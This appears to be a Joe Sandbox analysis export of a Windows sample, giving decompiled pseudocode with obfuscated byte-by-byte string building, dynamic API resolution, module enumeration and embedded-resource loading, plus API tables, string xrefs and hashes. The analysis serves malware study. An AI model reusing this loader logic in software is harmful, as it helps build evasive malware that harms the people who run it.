						 *((char*)(_t561 + 0x49)) = 0x76;
						 *((char*)(_t561 + 0x4a)) = 0xb9;
						 *((char*)(_t561 + 0x4b)) = 0x34;
						 *((char*)(_t561 + 0x4c)) = 0xbf;
						 *((char*)(_t561 + 0x4d)) = 0x1e;
						 *((char*)(_t561 + 0x4e)) = 0xe7;
						 *((char*)(_t561 + 0x4f)) = 0x78;
						 *((char*)(_t561 + 0x50)) = 0x98;
						 *((char*)(_t561 + 0x51)) = 0xe9;
						 *((char*)(_t561 + 0x52)) = 0x6f;
						 *((char*)(_t561 + 0x53)) = 0xb4;
						 *((char*)(_t561 + 0x54)) = 0;
						_t364 = E00401650(_t561 + 0x30, _t561 + 0x110);
						_t562 = _t561 + 0x24;
						_t365 = LoadLibraryA(_t364); // executed
						_t538 = _t365;
						 *((char*)(_t562 + 0x10)) = 0xe0;
						 *((char*)(_t562 + 0x11)) = 0x18;
						 *((char*)(_t562 + 0x12)) = 0xad;
						 *((char*)(_t562 + 0x13)) = 0x36;
						 *((char*)(_t562 + 0x14)) = 0x95;
						 *((char*)(_t562 + 0x15)) = 0x21;
						_t451 = _t562 + 0x134;
						 *((char*)(_t562 + 0x1e)) = 0x2a;
						 *((char*)(_t562 + 0x1f)) = 0x57;
						 *((char*)(_t562 + 0x20)) = 0xda;
						 *((char*)(_t562 + 0x21)) = 0xc;
						 *((char*)(_t562 + 0x22)) = 0x55;
						 *((char*)(_t562 + 0x23)) = 0x25;
						 *((char*)(_t562 + 0x24)) = 0x8c;
						 *((char*)(_t562 + 0x25)) = 0xf9;
						 *((char*)(_t562 + 0x26)) = 0x35;
						 *((char*)(_t562 + 0x27)) = 0x97;
						 *((char*)(_t562 + 0x28)) = 0xd0;
						 *((char*)(_t562 + 0x29)) = 0x87;
						 *((char*)(_t562 + 0x2a)) = 0x7b;
						 *((char*)(_t562 + 0x2b)) = 0xf;
						 *((char*)(_t562 + 0x2c)) = 0xf4;
						 *((char*)(_t562 + 0x2d)) = 0x76;
						 *((char*)(_t562 + 0x2e)) = 0xb9;
						 *((char*)(_t562 + 0x2f)) = 0x34;
						 *((char*)(_t562 + 0x30)) = 0xbf;
						 *((char*)(_t562 + 0x31)) = 0x1e;
						 *((char*)(_t562 + 0x32)) = 0xe7;
						 *((char*)(_t562 + 0x33)) = 0x78;
						 *((char*)(_t562 + 0x34)) = 0x98;
						 *((char*)(_t562 + 0x35)) = 0xe9;
						 *((char*)(_t562 + 0x36)) = 0x6f;
						 *((char*)(_t562 + 0x37)) = 0xb4;
						 *((char*)(_t562 + 0x38)) = 0;
						_t366 = E00401650(_t562 + 0x14, _t451);
						_t563 = _t562 + 8;
						_t367 = GetProcAddress(_t365, _t366);
						__eflags = _t367;
						_t452 = _t451 & 0xffffff00 | _t367 != 0x00000000;
						__eflags = _t452;
						 *(_t563 + 0x47) = _t452 == 0;
						 *0x423480 = _t367;
						 *((intOrPtr*)(_t563 + 0x80)) = 0;
						 *((intOrPtr*)(_t563 + 0x84)) = 0;
						 *((intOrPtr*)(_t563 + 0x4c)) = 0;
						 *(_t563 + 0x58) = 0;
						 *(_t563 + 0x54) = 0;
						__eflags = _t452;
						if(_t452 != 0) {
							_t368 =  *_t367(0x41b230, 0x41b220, _t563 + 0x80); // executed
							__eflags = _t368;
							if(_t368 >= 0) {
								__eflags =  *(_t563 + 0x47);
								if( *(_t563 + 0x47) == 0) {
									 *((intOrPtr*)(_t563 + 0x17c)) = _t563 + 0x17c;
									E004018F0( *((intOrPtr*)(_t563 + 0x38)), _t563 + 0x17c, _t563 + 0x17c,  *((intOrPtr*)(_t563 + 0x38)), 3);
									_t376 =  *((intOrPtr*)(_t563 + 0x80));
									_t378 =  *((intOrPtr*)( *((intOrPtr*)( *_t376 + 0xc))))(_t376,  *((intOrPtr*)(_t563 + 0x178)), 0x41b240, _t563 + 0x84); // executed
									__eflags = _t378;
									if(_t378 >= 0) {
										_t381 =  *((intOrPtr*)(_t563 + 0x84));
										_t383 =  *((intOrPtr*)( *((intOrPtr*)( *_t381 + 0x24))))(_t381, 0x41b210, 0x41b290, _t563 + 0x4c); // executed
										__eflags = _t383;
										if(_t383 >= 0) {
											_t384 =  *((intOrPtr*)(_t563 + 0x4c));
											_t385 =  *((intOrPtr*)( *((intOrPtr*)( *_t384 + 0x28))))(_t384); // executed
											__eflags = _t385;
											if(_t385 >= 0) {
												 *((intOrPtr*)(_t563 + 0x38)) = 0;
												E00401870(_t563 + 0x44, _t552, "_._");
												_t539 = __imp__#8;
												 *((intOrPtr*)(_t563 + 0x40)) = 0;
												 *_t539(_t563 + 0x94);
												E00401870(_t563 + 0x3c, _t552, "___");
												 *_t539(_t563 + 0xa4);
												 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t563 + 0x4c)))) + 0x34))))( *((intOrPtr*)(_t563 + 0x50)), E004018D0(_t563 + 0x58)); // executed
												_t542 =  *(_t563 + 0x58);
												__eflags = _t542;
												if(_t542 == 0) {
													E0040AD90(0x80004003);
												}
												_t396 =  *((intOrPtr*)( *((intOrPtr*)( *_t542))))(_t542, 0x41b270, E004018D0(_t563 + 0x54));
												 *((intOrPtr*)(_t563 + 0x94)) = _t552 + 0xfffffff2;
												 *((intOrPtr*)(_t563 + 0x98)) = 0;
												__imp__#15(0x11, 1, _t563 + 0x88); // executed
												_t543 = _t396;
												 *((intOrPtr*)(_t563 + 0x50)) = 0;
												__imp__#23(_t543, _t563 + 0x48);
												E0040B350(0, _t528, _t543,  *((intOrPtr*)(_t563 + 0x48)), _t528, _t552 + 0xfffffff2);
												_t564 = _t563 + 0xc;
												__imp__#24(_t543);
												_t399 =  *(_t564 + 0x54);
												__eflags = _t399;
												if(_t399 == 0) {
													_t399 = E0040AD90(0x80004003);
												}
												 *((intOrPtr*)( *((intOrPtr*)( *_t399 + 0xb4))))(_t399, _t543, E004018D0(_t564 + 0x34)); // executed
												__eflags = _t543;
												if(_t543 != 0) {
													__imp__#16(_t543); // executed
												}
												_t402 =  *(_t564 + 0x34);
												__eflags = _t402;
												if(_t402 == 0) {
													_t402 = E0040AD90(0x80004003);
												}
												_t469 =  *(_t564 + 0x40);
												_t555 = _t402;
												__eflags = _t469;
												if(_t469 == 0) {
													_t531 = 0;
													__eflags = 0;
												} else {
													_t531 =  *_t469;
												}
												 *((intOrPtr*)( *((intOrPtr*)( *_t402 + 0x44))))(_t555, _t531, E004018D0(_t564 + 0x3c)); // executed
												__imp__#411(0xc, 0, 0);
												_t471 =  *(_t564 + 0x3c);
												__eflags = _t471;
												if(_t471 == 0) {
													E0040AD90(0x80004003);
												}
												_t405 =  *(_t564 + 0x38);
												__eflags = _t405;
												if(_t405 == 0) {
													_t514 = 0;
													__eflags = 0;
												} else {
													_t514 =  *_t405;
												}
												_t563 = _t564 - 0x10;
												_t407 = _t563;
												 *_t407 =  *((intOrPtr*)(_t564 + 0x94));
												 *((intOrPtr*)(_t407 + 4)) =  *((intOrPtr*)(_t563 + 0xb0));
												 *((intOrPtr*)(_t407 + 8)) =  *((intOrPtr*)(_t563 + 0xb8));
												_t528 =  *((intOrPtr*)(_t563 + 0xc0));
												 *((intOrPtr*)(_t407 + 0xc)) =  *((intOrPtr*)(_t563 + 0xc0));
												 *((intOrPtr*)( *((intOrPtr*)( *_t471 + 0xe4))))(_t471, _t514, 0x118, 0, 0, _t564 + 0xa4);
												_t538 = __imp__#9; // 0x777dcf00
												_t538->i(_t563 + 0xa4);
												E004019A0(_t563 + 0x38);
												_t538->i(_t563 + 0x94);
												_t413 =  *(_t563 + 0x3c);
												__eflags = _t413;
												if(_t413 != 0) {
													 *((intOrPtr*)( *((intOrPtr*)( *_t413 + 8))))(_t413);
												}
												E004019A0(_t563 + 0x40);
												_t415 =  *(_t563 + 0x34);
												__eflags = _t415;
												if(_t415 != 0) {
													 *((intOrPtr*)( *((intOrPtr*)( *_t415 + 8))))(_t415);
												}
											}
										}
									}
									_t379 =  *((intOrPtr*)(_t563 + 0x174));
									__eflags = _t379 - _t563 + 0x178;
									if(__eflags != 0) {
										_push(_t379);
										E0040B6B5(0, _t528, _t538, __eflags);
										_t563 = _t563 + 4;
									}
								}
							}
							_t369 =  *(_t563 + 0x54);
							__eflags = _t369;
							if(_t369 != 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t369 + 8))))(_t369);
							}
							_t370 =  *(_t563 + 0x58);
							__eflags = _t370;
							if(_t370 != 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t370 + 8))))(_t370);
							}
						}
						goto L80;
					} else {
						_t428 = E00401650(_t557 + 0x60, _t557 + 0xd4);
						_t565 = _t557 + 8;
						_t547 = _t428;
						_t520 = _t565 + 0x298;
						while(1) {
							_t429 =  *_t520;
							if(_t429 !=  *_t547) {
								break;
							}
							if(_t429 == 0) {
								L7:
								_t429 = 0;
							} else {
								_t493 =  *((intOrPtr*)(_t520 + 1));
								if(_t493 !=  *((intOrPtr*)(_t547 + 1))) {
									break;
								} else {
									_t520 = _t520 + 2;
									_t547 = _t547 + 2;
									if(_t493 != 0) {
										continue;
									} else {
										goto L7;
									}
								}
							}
							L9:
							if(_t429 != 0) {
								_t431 = E00401650(_t565 + 0x14, _t565 + 0xb4);
								_t557 = _t565 + 8;
								_t548 = _t431;
								_t488 = _t557 + 0x298;
								while(1) {
									_t432 =  *_t488;
									__eflags = _t432 -  *_t548;
									if(_t432 !=  *_t548) {
										break;
									}
									__eflags = _t432;
									if(_t432 == 0) {
										L16:
										_t432 = 0;
									} else {
										_t432 =  *((intOrPtr*)(_t488 + 1));
										__eflags = _t432 -  *((intOrPtr*)(_t548 + 1));
										if(_t432 !=  *((intOrPtr*)(_t548 + 1))) {
											break;
										} else {
											_t488 = _t488 + 2;
											_t548 = _t548 + 2;
											__eflags = _t432;
											if(_t432 != 0) {
												continue;
											} else {
												goto L16;
											}
										}
									}
									L18:
									__eflags = _t432;
									if(_t432 == 0) {
										goto L10;
									} else {
										_t435 = Module32Next(_t525, _t557 + 0x278);
										__eflags = _t435;
										if(_t435 != 0) {
											do {
												_t437 = E00401650(_t557 + 0x60, _t557 + 0xd4);
												_t566 = _t557 + 8;
												_t549 = _t437;
												_t490 = _t566 + 0x298;
												while(1) {
													_t438 =  *_t490;
													__eflags = _t438 -  *_t549;
													if(_t438 !=  *_t549) {
														break;
													}
													__eflags = _t438;
													if(_t438 == 0) {
														L26:
														_t438 = 0;
													} else {
														_t438 =  *((intOrPtr*)(_t490 + 1));
														__eflags = _t438 -  *((intOrPtr*)(_t549 + 1));
														if(_t438 !=  *((intOrPtr*)(_t549 + 1))) {
															break;
														} else {
															_t490 = _t490 + 2;
															_t549 = _t549 + 2;
															__eflags = _t438;
															if(_t438 != 0) {
																continue;
															} else {
																goto L26;
															}
														}
													}
													L28:
													__eflags = _t438;
													if(_t438 == 0) {
														goto L10;
													} else {
														_t439 = E00401650(_t566 + 0x14, _t566 + 0xb4);
														_t557 = _t566 + 8;
														_t550 = _t439;
														_t492 = _t557 + 0x298;
														while(1) {
															_t440 =  *_t492;
															__eflags = _t440 -  *_t550;
															if(_t440 !=  *_t550) {
																break;
															}
															__eflags = _t440;
															if(_t440 == 0) {
																L34:
																_t440 = 0;
															} else {
																_t440 =  *((intOrPtr*)(_t492 + 1));
																__eflags = _t440 -  *((intOrPtr*)(_t550 + 1));
																if(_t440 !=  *((intOrPtr*)(_t550 + 1))) {
																	break;
																} else {
																	_t492 = _t492 + 2;
																	_t550 = _t550 + 2;
																	__eflags = _t440;
																	if(_t440 != 0) {
																		continue;
																	} else {
																		goto L34;
																	}
																}
															}
															L36:
															__eflags = _t440;
															if(_t440 == 0) {
																goto L10;
															} else {
																goto L37;
															}
															goto L81;
														}
														asm("sbb eax, eax");
														asm("sbb eax, 0xffffffff");
														goto L36;
													}
													goto L81;
												}
												asm("sbb eax, eax");
												asm("sbb eax, 0xffffffff");
												goto L28;
												L37:
												_t442 = Module32Next(_t525, _t557 + 0x278);
												__eflags = _t442;
											} while (_t442 != 0);
										}
										goto L38;
									}
									goto L81;
								}
								asm("sbb eax, eax");
								asm("sbb eax, 0xffffffff");
								goto L18;
							} else {
								L10:
								CloseHandle(_t525);
								return 0;
							}
							goto L81;
						}
						asm("sbb eax, eax");
						asm("sbb eax, 0xffffffff");
						goto L9;
					}
				}
				L81:
			}

0x004019f0
0x004019f0
0x004019fd
0x00401a10
0x00401a15
0x00401a1a
0x00401a1f
0x00401a24
0x00401a29
0x00401a2e
0x00401a33
0x00401a38
0x00401a3d
0x00401a42
0x00401a47
0x00401a4c
0x00401a51
0x00401a56
0x00401a5b
0x00401a60
0x00401a65
0x00401a6a
0x00401a6f
0x00401a74
0x00401a79
0x00401a7e
0x00401a83
0x00401a88
0x00401a8d
0x00401a92
0x00401a97
0x00401a9c
0x00401aa1
0x00401aa6
0x00401aab
0x00401ab0
0x00401ab9
0x00401aba
0x00401abf
0x00401ac7
0x0040248d
0x0040248d
0x00402496
0x00401acd
0x00401ad6
0x00401ae2
0x00401ae6
0x00401af1
0x00401af6
0x00401afb
0x00401b00
0x00401b05
0x00401b0a
0x00401b0f
0x00401b14
0x00401b19
0x00401b1e
0x00401b23
0x00401b28
0x00401b2d
0x00401b32
0x00401b37
0x00401b3c
0x00401b41
0x00401b46
0x00401b4b
0x00401b50
0x00401b55
0x00401b5a
0x00401b5f
0x00401b64
0x00401b69
0x00401b6e
0x00401b73
0x00401b78
0x00401b7d
0x00401b85
0x00401b8d
0x00401b95
0x00401b9d
0x00401ba4
0x00401ba9
0x00401bae
0x00401bb3
0x00401bb8
0x00401bbd
0x00401bc2
0x00401bc7
0x00401bcc
0x00401bd1
0x00401bd6
0x00401bdb
0x00401be0
0x00401be5
0x00401bea
0x00401bef
0x00401bf4
0x00401bf9
0x00401bfe
0x00401c03
0x00401c08
0x00401c0d
0x00401c12
0x00401c17
0x00401c1c
0x00401c21
0x00401c26
0x00401c2b
0x00401c30
0x00401c35
0x00401c3a
0x00401c3f
0x00401c44
0x00401c48
0x00401c4f
0x00401dc3
0x00401dc4
0x00401de0
0x00401de2
0x00401de7
0x00401dec
0x00401df1
0x00401df6
0x00401dfb
0x00401e00
0x00401e05
0x00401e0a
0x00401e0f
0x00401e14
0x00401e19
0x00401e1e
0x00401e23
0x00401e28
0x00401e2d
0x00401e32
0x00401e37
0x00401e3c
0x00401e41
0x00401e46
0x00401e4b
0x00401e50
0x00401e55
0x00401e5a
0x00401e5f
0x00401e64
0x00401e69
0x00401e6e
0x00401e73
0x00401e78
0x00401e7d
0x00401e82
0x00401e86
0x00401e8b
0x00401e96
0x00401e9a
0x00401ea4
0x00401eaf
0x00401eba
0x00401ebf
0x00401ec4
0x00401ec6
0x00401ecb
0x00401ece
0x00401ed2
0x00401ed4
0x00401eef
0x00401ed6
0x00401edd
0x00401ee2
0x00401ee6
0x00401ee9
0x00401ee9
0x00401ef7
0x00401efc
0x00401f02
0x00401f08
0x00401f0c
0x00401f15
0x00401f18
0x00401f1a
0x00401f1c
0x00401f22
0x00401f22
0x00401f24
0x00401f28
0x00401f2f
0x00401f33
0x00401f33
0x00401f40
0x00401f45
0x00401f4a
0x00401f4b
0x00401f50
0x00401f58
0x00401f58
0x00401f58
0x00401f58
0x00401f33
0x00401f63
0x00401f63
0x00401f69
0x00401f72
0x00401f72
0x00401f72
0x00401f73
0x00401f75
0x00401f7b
0x00401f80
0x00401f81
0x00401f86
0x00401f86
0x00401f8c
0x00401f8d
0x00401f8d
0x00401f9d
0x00401fa2
0x00401fa6
0x00401fac
0x00401faf
0x00401fb6
0x00401fbf
0x00401fc4
0x00401fc8
0x00401fce
0x00401fd3
0x00401fe0
0x00401fec
0x00401ffe
0x00402001
0x00402006
0x0040200b
0x00402010
0x00402015
0x0040201a
0x0040201f
0x00402024
0x00402029
0x0040202e
0x00402033
0x00402038
0x0040203d
0x00402042
0x00402047
0x0040204c
0x00402051
0x00402056
0x0040205b
0x00402060
0x00402065
0x0040206a
0x0040206f
0x00402074
0x00402079
0x0040207e
0x00402083
0x00402088
0x0040208d
0x00402092
0x00402097
0x0040209c
0x004020a1
0x004020a5
0x004020aa
0x004020ae
0x004020b4
0x004020b6
0x004020bb
0x004020c0
0x004020c5
0x004020ca
0x004020cf
0x004020d4
0x004020e1
0x004020e6
0x004020eb
0x004020f0
0x004020f5
0x004020fa
0x004020ff
0x00402104
0x00402109
0x0040210e
0x00402113
0x00402118
0x0040211d
0x00402122
0x00402127
0x0040212c
0x00402131
0x00402136
0x0040213b
0x00402140
0x00402145
0x0040214a
0x0040214f
0x00402154
0x00402159
0x0040215e
0x00402163
0x00402167
0x0040216c
0x00402171
0x00402177
0x00402179
0x0040217c
0x0040217e
0x00402183
0x00402188
0x0040218f
0x00402196
0x0040219a
0x0040219e
0x004021a2
0x004021a4
0x004021bc
0x004021be
0x004021c0
0x004021c6
0x004021ca
0x004021e5
0x004021ec
0x004021f1
0x00402213
0x00402215
0x00402217
0x0040221d
0x00402239
0x0040223b
0x0040223d
0x00402243
0x0040224d
0x0040224f
0x00402251
0x00402260
0x00402264
0x00402269
0x00402277
0x0040227b
0x00402286
0x00402293
0x004022af
0x004022b1
0x004022b5
0x004022b7
0x004022be
0x004022be
0x004022d7
0x004022e8
0x004022ef
0x004022f6
0x00402300
0x00402304
0x00402308
0x00402315
0x0040231a
0x0040231e
0x00402324
0x00402328
0x0040232a
0x00402331
0x00402331
0x0040234e
0x00402350
0x00402352
0x00402355
0x00402355
0x0040235b
0x0040235f
0x00402361
0x00402368
0x00402368
0x0040236d
0x00402371
0x00402373
0x00402375
0x0040237b
0x0040237b
0x00402377
0x00402377
0x00402377
0x00402390
0x00402396
0x0040239c
0x004023a0
0x004023a2
0x004023a9
0x004023a9
0x004023ae
0x004023b2
0x004023b4
0x004023ba
0x004023ba
0x004023b6
0x004023b6
0x004023b6
0x004023ce
0x004023d1
0x004023d3
0x004023dd
0x004023ec
0x004023ef
0x004023fe
0x00402401
0x00402403
0x00402411
0x00402417
0x00402424
0x00402426
0x0040242a
0x0040242c
0x00402434
0x00402434
0x0040243a
0x0040243f
0x00402443
0x00402445
0x0040244d
0x0040244d
0x00402445
0x00402251
0x0040223d
0x0040244f
0x0040245d
0x0040245f
0x00402461
0x00402462
0x00402467
0x00402467
0x0040245f
0x004021ca
0x0040246a
0x0040246e
0x00402470
0x00402478
0x00402478
0x0040247a
0x0040247e
0x00402480
0x00402488
0x00402488
0x00402480
0x00000000
0x00401c55
0x00401c62
0x00401c67
0x00401c6a
0x00401c6c
0x00401c73
0x00401c73
0x00401c77
0x00000000
0x00000000
0x00401c7b
0x00401c8f
0x00401c8f
0x00401c7d
0x00401c7d
0x00401c83
0x00000000
0x00401c85
0x00401c85
0x00401c88
0x00401c8d
0x00000000
0x00000000
0x00000000
0x00000000
0x00401c8d
0x00401c83
0x00401c98
0x00401c9a
0x00401cbd
0x00401cc2
0x00401cc5
0x00401cc7
0x00401cd0
0x00401cd0
0x00401cd2
0x00401cd4
0x00000000
0x00000000
0x00401cd6
0x00401cd8
0x00401cec
0x00401cec
0x00401cda
0x00401cda
0x00401cdd
0x00401ce0
0x00000000
0x00401ce2
0x00401ce2
0x00401ce5
0x00401ce8
0x00401cea
0x00000000
0x00000000
0x00000000
0x00000000
0x00401cea
0x00401ce0
0x00401cf5
0x00401cf5
0x00401cf7
0x00000000
0x00401cf9
0x00401d02
0x00401d07
0x00401d09
0x00401d10
0x00401d1d
0x00401d22
0x00401d25
0x00401d27
0x00401d30
0x00401d30
0x00401d32
0x00401d34
0x00000000
0x00000000
0x00401d36
0x00401d38
0x00401d4c
0x00401d4c
0x00401d3a
0x00401d3a
0x00401d3d
0x00401d40
0x00000000
0x00401d42
0x00401d42
0x00401d45
0x00401d48
0x00401d4a
0x00000000
0x00000000
0x00000000
0x00000000
0x00401d4a
0x00401d40
0x00401d55
0x00401d55
0x00401d57
0x00000000
0x00401d5d
0x00401d6a
0x00401d6f
0x00401d72
0x00401d74
0x00401d80
0x00401d80
0x00401d82
0x00401d84
0x00000000
0x00000000
0x00401d86
0x00401d88
0x00401d9c
0x00401d9c
0x00401d8a
0x00401d8a
0x00401d8d
0x00401d90
0x00000000
0x00401d92
0x00401d92
0x00401d95
0x00401d98
0x00401d9a
0x00000000
0x00000000
0x00000000
0x00000000
0x00401d9a
0x00401d90
0x00401da5
0x00401da5
0x00401da7
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00401da7
0x00401da0
0x00401da2
0x00000000
0x00401da2
0x00000000
0x00401d57
0x00401d50
0x00401d52
0x00000000
0x00401dad
0x00401db6
0x00401dbb
0x00401dbb
0x00401d10
0x00000000
0x00401d09
0x00000000
0x00401cf7
0x00401cf0
0x00401cf2
0x00000000
0x00401c9c
0x00401c9c
0x00401c9d
0x00401caf
0x00401caf
0x00000000
0x00401c9a
0x00401c93
0x00401c95
0x00000000
0x00401c95
0x00401c4f
0x00000000

APIs

OleInitialize.OLE32(00000000), ref: 004019FD
_getenv.LIBCMT ref: 00401ABA
GetCurrentProcessId.KERNEL32 ref: 00401ACD
CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
Module32First.KERNEL32 ref: 00401C48
CloseHandle.KERNEL32(00000000,?,?,00000000,?), ref: 00401C9D
Module32Next.KERNEL32 ref: 00401D02
Module32Next.KERNEL32 ref: 00401DB6
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401DC4
GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
FindResourceA.KERNEL32(00000000,00000000,00000000), ref: 00401E90
LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
LockResource.KERNEL32(00000000), ref: 00401EA7
SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
_malloc.LIBCMT ref: 00401EBA
_memset.LIBCMT ref: 00401EDD
SizeofResource.KERNEL32(00000000,?), ref: 00401F02

Strings

., xrefs: 0040201F
E, xrefs: 00401E0F
!, xrefs: 0040201A
x, xrefs: 00402088
o, xrefs: 00401B8D
', xrefs: 00401AF6
8, xrefs: 00401BA9
{, xrefs: 0040211D
", xrefs: 00401B0F
%, xrefs: 004020FA
o, xrefs: 00402097
4, xrefs: 00402136
5, xrefs: 00402109
x, xrefs: 00401E69
*, xrefs: 00401A1F
v, xrefs: 0040212C
:, xrefs: 00401B28
v, xrefs: 00401B5A
{, xrefs: 00401E3C
x, xrefs: 0040214A
o, xrefs: 00402159
4, xrefs: 00402074
D, xrefs: 00401DFB
W, xrefs: 00402033
W, xrefs: 00401B23
!, xrefs: 004020CF
', xrefs: 00402006
{, xrefs: 00401B4B
U, xrefs: 004020F5
v, xrefs: 0040206A
V, xrefs: 00402038
[, xrefs: 00401B37
V, xrefs: 00401E19
v, xrefs: 00401E4B
W, xrefs: 00401B14
h, xrefs: 00401A6F
{, xrefs: 0040205B
!, xrefs: 00401B1E
*, xrefs: 004020E1
___, xrefs: 0040227D
[, xrefs: 00402047
0, xrefs: 00401BBD
4, xrefs: 00401B64
., xrefs: 00401B0A
W, xrefs: 004020E6
x, xrefs: 00401B78
6, xrefs: 004020C5
_._, xrefs: 00402257
), xrefs: 0040202E

Memory Dump Source

Source File: 00000006.00000002.369924235.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.369924235.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.369924235.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_con1332.jbxd

Yara matches

Similarity

API ID: Resource$Module32$CloseFindHandleNextSizeof$ChangeCreateCurrentFirstInitializeLoadLockModuleNotificationProcessSnapshotToolhelp32_getenv_malloc_memset
String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
API String ID: 2366190142-2962942730
Opcode ID: 9b8e818dc389e7faa11c559f92d128544e607fef32914ff1a283466d1b654c82
Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
Opcode Fuzzy Hash: 9b8e818dc389e7faa11c559f92d128544e607fef32914ff1a283466d1b654c82
Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B

Uniqueness

Uniqueness Score: -1.00%

Function 004018F0 Relevance: 6.3, APIs: 5, Instructions: 77
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E004018F0(void* __eax, char** __ecx, void* __edx, char* _a4, int _a8) {
				void* __ebx;
				void* __ebp;
				signed int _t12;
				void* _t21;
				int _t25;
				void* _t30;
				int _t32;
				char* _t35;

				_t21 = __edx;
				_t35 = _a4;
				_t17 = __ecx;
				if(_t35 != 0) {
					_t25 = lstrlenA(_t35) + 1;
					E004017E0(_t17, _t21, _t35, _t17, _t25,  &(_t17[1]), 0x80);
					_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t25); // executed
					asm("sbb esi, esi");
					_t30 =  ~_t12 + 1;
					if(_t30 != 0) {
						_t12 = GetLastError();
						if(_t12 == 0x7a) {
							_t32 = MultiByteToWideChar(_a8, 0, _t35, _t25, 0, 0);
							E004017E0(_t17, _a8, _t35, _t17, _t32,  &(_t17[1]), 0x80);
							_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t32);
							asm("sbb esi, esi");
							_t30 =  ~_t12 + 1;
						}
						if(_t30 != 0) {
							_t12 = E00401030();
						}
					}
					return _t12;
				} else {
					 *__ecx = _t35;
					return __eax;
				}
			}

0x004018f0
0x004018f2
0x004018f6
0x004018fa
0x00401917
0x0040191a
0x0040192f
0x00401939
0x0040193b
0x0040193e
0x00401940
0x00401949
0x0040195e
0x0040196b
0x00401980
0x0040198a
0x0040198c
0x0040198c
0x0040198f
0x00401991
0x00401991
0x0040198f
0x0040199a
0x004018fc
0x004018fc
0x00401900
0x00401900

APIs

lstrlenA.KERNEL32(?), ref: 00401906
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
GetLastError.KERNEL32 ref: 00401940
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980

Memory Dump Source

Source File: 00000006.00000002.369924235.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.369924235.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.369924235.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_con1332.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLastlstrlen
String ID:
API String ID: 3322701435-0
Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8

Uniqueness

Uniqueness Score: -1.00%

Function 0040AF66 Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 63%

			E0040AF66(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4) {
				signed int _v4;
				signed int _v16;
				signed int _v40;
				void* _t14;
				signed int _t15;
				intOrPtr* _t21;
				signed int _t24;
				void* _t28;
				void* _t39;
				void* _t40;
				signed int _t42;
				void* _t45;
				void* _t47;
				void* _t51;

				_t40 = __edi;
				_t28 = __ebx;
				_t45 = _t51;
				while(1) {
					_t14 = E0040B84D(_t28, _t39, _t40, _a4); // executed
					if(_t14 != 0) {
						break;
					}
					_t15 = E0040D2E3(_a4);
					__eflags = _t15;
					if(_t15 == 0) {
						__eflags =  *0x423490 & 0x00000001;
						if(( *0x423490 & 0x00000001) == 0) {
							 *0x423490 =  *0x423490 | 0x00000001;
							__eflags =  *0x423490;
							E0040AEFC(0x423484);
							E0040D2BD( *0x423490, 0x41a704);
						}
						E0040AF49( &_v16, 0x423484);
						E0040CD39( &_v16, 0x420fa4);
						asm("int3");
						_t47 = _t45;
						_push(_t47);
						_push(0xc);
						_push(0x420ff8);
						_t19 = E0040E1D8(_t28, _t40, 0x423484);
						_t42 = _v4;
						__eflags = _t42;
						if(_t42 != 0) {
							__eflags =  *0x4250b0 - 3;
							if( *0x4250b0 != 3) {
								_push(_t42);
								goto L16;
							} else {
								E0040D6E0(_t28, 4);
								_v16 = _v16 & 0x00000000;
								_t24 = E0040D713(_t42);
								_v40 = _t24;
								__eflags = _t24;
								if(_t24 != 0) {
									_push(_t42);
									_push(_t24);
									E0040D743();
								}
								_v16 = 0xfffffffe;
								_t19 = E0040B70B();
								__eflags = _v40;
								if(_v40 == 0) {
									_push(_v4);
									L16:
									__eflags = HeapFree( *0x4234b4, 0, ??);
									if(__eflags == 0) {
										_t21 = E0040BFC1(__eflags);
										 *_t21 = E0040BF7F(GetLastError());
									}
								}
							}
						}
						return E0040E21D(_t19);
					} else {
						continue;
					}
					L19:
				}
				return _t14;
				goto L19;
			}

0x0040af66
0x0040af66
0x0040af69
0x0040af7d
0x0040af80
0x0040af88
0x00000000
0x00000000
0x0040af73
0x0040af79
